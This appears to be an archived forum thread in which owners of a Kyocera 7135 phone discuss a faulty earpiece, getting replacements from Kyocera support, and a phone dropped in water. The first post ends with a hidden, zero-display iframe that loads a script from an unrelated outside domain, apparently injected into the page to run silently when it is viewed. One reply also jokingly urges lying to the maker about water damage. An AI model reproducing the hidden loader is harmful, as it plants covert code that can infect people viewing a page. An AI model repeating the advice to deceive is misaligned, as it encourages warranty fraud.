+ Reply to Thread

Thread: Broken 7135 :(

Broken 7135 :(

I bought a 7135 about two weeks ago from getconnected. The phone has been great with the exception of those darned inverted screens. Even with a hard reset and nothing but their factory software I still get the occasional one (less often though).

More recently the speaker has cut off on the phone. Not the speaker for the speaker phone but the speaker when just holding the phone to my face. It cuts in and out all the time now. At first I thought it was the cell network but I made a series of calls and came to the conclusion that it is the phone

Has anyone else had this problem?

And for those of you that have had the phone replaced, do you do it through getconnected or kyocera? I'm hoping I can get it replaced overnight and just send the old one back when I have a new one in hand.

Any advice for getting it replaced is appreciated.

Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Broken 7135 :(

Originally posted by nathan
    Any advice for getting it replaced is appreciated.

Thanks!
    If you call Kyocera directly and speak to Tier 3 support, after reviewing your issues they determine whether they should send you a new phone. You have two options. You can send your phone back for repair, or they will take a credit card and send you a new phone and your card won't be charged as long as you send the old phone back within ten days of receiving the new phone.

The UNTHINKABLE happened!!!

:bawling :bawling

An improperly seated 7135 (holster) sends my phone into the drink!!

I recovered it. I dried it the best I could. It works but there is water damage visible on the screen.

I am desolate. What can I do? Anybody have any experience with repair on these phones? Do you think Kyocera would show me any mercy????? Purchase protection on credit card is not available.

What is the best Kyocera support number to call?

HELP!

Thomas

No insurance?

Insurance

I just got the phone. The insurance pamplet is in my car. The Verizon phone rep said they could not cover it.

Another rep at a Verizon outlet gave me the private insurance pamplet. Was planning on activating it soon.

It might be covered under my home-owners. I don't know yet.

Actually most cellphone insurance excludes water damage. I know from the time I fell into a trout pond with a cellphone hooked on my belt! (Oh the humiliation! :>)

How did your 7135 fall into "the drink" ?

Phone insurance usually specificly covers liquid damage. That is the go to for those types of problems.

speaker out

Nathan, my speaker (the one I listen to when I hold the phone to my ear in the traditional way) is now out, too. I noticed it today--I have had my phone (my second one since the first one fatally excepted its way out of my life) for about a week.

It works via speakerphone and via headset but not any other way. I'll take it back to VZW tomorrow and try, try again.

I love this phone, I really do, but if this
    third one is not any better I'm going to have to reactivate my trusty 6035 until I'm convinced there's a solid replacement out there. This, of course, would be a bummer.

cph
    cph

Originally posted by jazmaan
    How did your 7135 fall into "the drink" ?
    Here's my guess...

Drink = Toilet

Am I right?
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    Here's my guess...

Drink = Toilet

Am I right?
    Eugh. That's gotta go back for some serious decontamination, then, and pray that it's not your refurbished warranty replacement if yours goes out.

Run away, run away!
    ---------------
    The same thing we do every night, Pinky...

Re: speaker out

Originally posted by cpherschend
    Nathan, my speaker
    Oh, for a minute there I thought you named your speaker!

Originally posted by BrerLapn
    Eugh. That's gotta go back for some serious decontamination, then, and pray that it's not your refurbished warranty replacement if yours goes out.

Run away, run away!
    LOL... I've always hated refurbs as it is... but I never gave much thought to a scenario like that. Thanks a lot BrerLapn... as if I wasn't already being overly protective of my baby

Now that I think about it, my current 7135 has only been touched directly (it's almost always in the leather case) by one other set of hands (alanb's, when I borrowed his spare battery). I'll stop talking about this subject now... before it starts sounding really weird
    Please visit my picture site: Robert-O-Rama :)

Um... yeah... good idea bro.
    ~'kito
    pdaPhoneHome Moderator

Re: The UNTHINKABLE happened!!!

Originally posted by tdempsey
    :bawling :bawling

An improperly seated 7135 (holster) sends my phone into the drink!!

I recovered it. I dried it the best I could. It works but there is water damage visible on the screen.

I am desolate. What can I do? Anybody have any experience with repair on these phones? Do you think Kyocera would show me any mercy????? Purchase protection on credit card is not available.

What is the best Kyocera support number to call?

HELP!

Thomas
    Dry it and lie!